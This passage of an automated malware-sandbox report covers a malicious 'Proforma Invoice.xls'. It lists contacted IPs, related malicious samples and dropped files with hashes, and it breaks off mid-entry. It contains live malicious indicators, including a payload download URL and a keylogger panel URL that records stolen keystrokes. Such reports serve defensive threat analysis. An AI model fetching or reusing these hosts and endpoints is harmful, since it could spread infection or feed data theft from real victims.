                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile858DE975-BAE2-4804-817A-43A69FCAFAEC.0.drfalse
                                                                                                                                            high
                                                                                                                                            http://status.rapidssl.com0powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown

                                                                                                                                            Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            202.92.6.10
                                                                                                                                            unknownViet Nam
                                                                                                                                            45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                                                            104.22.1.232
                                                                                                                                            unknownUnited States
                                                                                                                                            13335CLOUDFLARENETUStrue

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                            Analysis ID:320373
                                                                                                                                            Start date:19.11.2020
                                                                                                                                            Start time:10:03:08
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 7m 41s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:light
                                                                                                                                            Sample file name:Proforma Invoice.xls
                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                            Number of analysed new started processes analysed:28
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • GSI enabled (VBA)
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal92.expl.evad.winXLS@16/20@2/2
                                                                                                                                            EGA Information:Failed
                                                                                                                                            HDC Information:Failed
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Adjust boot time
                                                                                                                                            • Enable AMSI
                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                            • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                            • Attach to Office via COM
                                                                                                                                            • Scroll down
                                                                                                                                            • Close Viewer
                                                                                                                                            Warnings:
                                                                                                                                            Show All
                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 168.61.161.212, 52.109.76.6, 52.109.12.21, 52.109.76.33, 52.147.198.201, 23.54.113.104, 51.104.146.109, 8.248.99.254, 8.248.115.254, 8.253.145.105, 8.238.85.126, 8.250.159.254, 20.54.26.129, 23.10.249.43, 23.10.249.26, 52.155.217.156
                                                                                                                                            • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            10:04:59API Interceptor241x Sleep call for process: powershell.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            202.92.6.10Invoice.xlsmGet hashmaliciousBrowse
                                                                                                                                            • shopphongtinh.com/client.exe
                                                                                                                                            SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
                                                                                                                                            • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
                                                                                                                                            invoice.exeGet hashmaliciousBrowse
                                                                                                                                            • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
                                                                                                                                            http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-IIGet hashmaliciousBrowse
                                                                                                                                            • thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/
                                                                                                                                            104.22.1.232http://cutt.ly/Get hashmaliciousBrowse
                                                                                                                                            • cutt.ly/

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            cutt.lyShipping Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Shipping Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Shipping Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            file.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            file.xlsGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            file.xlsGet hashmaliciousBrowse
                                                                                                                                            • 172.67.8.238
                                                                                                                                            File.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            shopphongtinh.comProforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10
                                                                                                                                            client.exeGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10
                                                                                                                                            Invoice.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10
                                                                                                                                            SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10
                                                                                                                                            invoice.exeGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10

                                                                                                                                            ASN

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            CLOUDFLARENETUSProforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.0.232
                                                                                                                                            https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                            • 104.18.215.67
                                                                                                                                            1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.20.138.65
                                                                                                                                            https://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                                                                                                                            • 104.18.108.36
                                                                                                                                            quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.188.154
                                                                                                                                            Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.24.105.107
                                                                                                                                            1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                            • 162.159.134.233
                                                                                                                                            INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.27.152.230
                                                                                                                                            PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                            • 104.20.22.46
                                                                                                                                            doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.27.172.15
                                                                                                                                            PO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                            • 104.20.23.46
                                                                                                                                            doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.27.173.15
                                                                                                                                            TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.18.57.249
                                                                                                                                            d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.27.173.15
                                                                                                                                            23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.23.99.190
                                                                                                                                            d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.27.173.15
                                                                                                                                            PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.23.98.190
                                                                                                                                            PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                            • 162.159.134.233
                                                                                                                                            07DYwxlVm4.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.27.133.115
                                                                                                                                            9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                            • 162.159.133.233
                                                                                                                                            VNPT-AS-VNVNPTCorpVNProforma Invoice.xlsGet hashmaliciousBrowse
                                                                                                                                            • 202.92.6.10
                                                                                                                                            qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                            • 221.132.33.88
                                                                                                                                            FMFF7xj5.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.131
                                                                                                                                            rJz6SePuqu.dllGet hashmaliciousBrowse
                                                                                                                                            • 123.19.40.157
                                                                                                                                            Order inquiry.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.38.182
                                                                                                                                            Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                                                                                                                            • 203.162.4.149
                                                                                                                                            http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                            • 113.160.161.75
                                                                                                                                            http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                                                                                                            • 113.160.161.75
                                                                                                                                            http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lmGet hashmaliciousBrowse
                                                                                                                                            • 113.160.161.75
                                                                                                                                            OK093822333448.docGet hashmaliciousBrowse
                                                                                                                                            • 103.255.237.196
                                                                                                                                            http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/Get hashmaliciousBrowse
                                                                                                                                            • 113.160.250.165
                                                                                                                                            DETAILS.jarGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            Readmore Details.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            detail-information.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            executed.exeGet hashmaliciousBrowse
                                                                                                                                            • 103.207.39.83
                                                                                                                                            _000819.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81
                                                                                                                                            _000822.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81
                                                                                                                                            _000819.exeGet hashmaliciousBrowse
                                                                                                                                            • 113.161.148.81

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9ad1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            https://greatdownloadplace.net/estate/formated/xlsc/Setup_v177.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            BlueJeansInstaller.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            List Of Orders.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Status____201711.gz.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Documento relativo al carico e alla spedizione del cliente_italy2020.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            b095b966805abb7df4ffddf183def880.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            SIN029088.xlsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            Request for Quote_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            01_file.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            aguhvLvn.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            BlueJeans.2.25.11u.msiGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            2B027105A0C3.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232
                                                                                                                                            SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                                                                                                            • 104.22.1.232

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\858DE975-BAE2-4804-817A-43A69FCAFAEC
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):129952
                                                                                                                                            Entropy (8bit):5.378340809923203
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ZcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:zmQ9DQW+zBX8u
                                                                                                                                            MD5:8F02A3BC24B652B81AC3A111979B1458
                                                                                                                                            SHA1:E256D984F09C492E7B7EEDF9310C07BCD0BE7BC5
                                                                                                                                            SHA-256:0103F0ED21E5390AC47E6C1F72B3B5539FC04CE1DD47480F9B7A252846655E5F
                                                                                                                                            SHA-512:9D94002CF7614C115C27B6B5AAD0A3A124E246B0ECB8844AB3B0A0E68EE7211DF6BC1BEFBED93D61133D785AF7453B2440C6436284AE7C45C3A68D418B6ACE0E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T09:04:15">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5829
                                                                                                                                            Entropy (8bit):4.8968676994158
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19908
                                                                                                                                            Entropy (8bit):5.574087613065968
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:GtkcGhGjYNQPE9v/6S0naulUA8p7Y9wSJ3AY+PJWtHJynL6Rr:hlNgoaTaulUA8ZcAhmIn2p
                                                                                                                                            MD5:C595F5692BC2EEB8CAE7E81B59DC5FA2
                                                                                                                                            SHA1:5CA8C7C338EBD5DB722C5BADBF514FB5C19A5028
                                                                                                                                            SHA-256:9364852F833E20EC7E3DC79B49B31E9FF46AD9A802D3BA25204E06C0D0B4E540
                                                                                                                                            SHA-512:679F5B1364707201D799BA4BF2F20DDE9C1D48D75E95FD2309745235E783681969D3428B9A09BBCA7567EF0A0A3DC22624AAA1712562C63A39DA34B1F5B19789
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: @...e..........."...........k.[.....a.j...R..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                            C:\Users\user\AppData\Local\Temp\E2B10000
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59432
                                                                                                                                            Entropy (8bit):7.870305841685203
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:QbiEo/K2LJR7mWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTp:PEo/K2V9mSb4wjE7zF0Rhdv1hQzMrTp
                                                                                                                                            MD5:93D36185F412830AA74DE8CBFC9F87A6
                                                                                                                                            SHA1:0E5F84D96DAA4313333C6DE412397C7732724C46
                                                                                                                                            SHA-256:9A49D18BF5A4C94DADE9B09DCE9218995C8AC6E806215544601BDBE0ADE247BF
                                                                                                                                            SHA-512:5DA8C49DAFBF16EE189023A868F173C00808F727BB6FB55F483450C0D356A4B0750EA3364A55F78BDFB28D2C79174AC9B56B0D788DA9C8E62A06338062C06C2F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: .TKO.0..#...|]..{@+....Y...0...._.Mi.=.4....\".......V.TK.I{.s>b.:.v.=...Y.28..;l......8.......5..9\..d........|...7.E...9._....et...M..q.O&W.+..8.n.?.{E.a..|..;.S.>! ..%d.M,..6.~6...r.w.?..{.".4..1.....SL...'ea.B9...{.=..U&j....|... VF<...z...I..q%..."fnAF..`j....:....Ih.M.<?E...X..J`...J.........)D..Y...>2.c....`.[.h..S^.LG...h7.C.-DT.s...v...|......_.{OtH.....h"E<=..=_.u ".Y..w..V......2/..............PK..........!..._.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hkfqyz4.u1o.ps1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mgeshrs.33b.psm1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hk3mg0dq.jyh.psm1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgv4klnb.wdl.psm1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pn5u0vvk.hhn.ps1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: 1
                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdoqjdn2.pcb.ps1
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
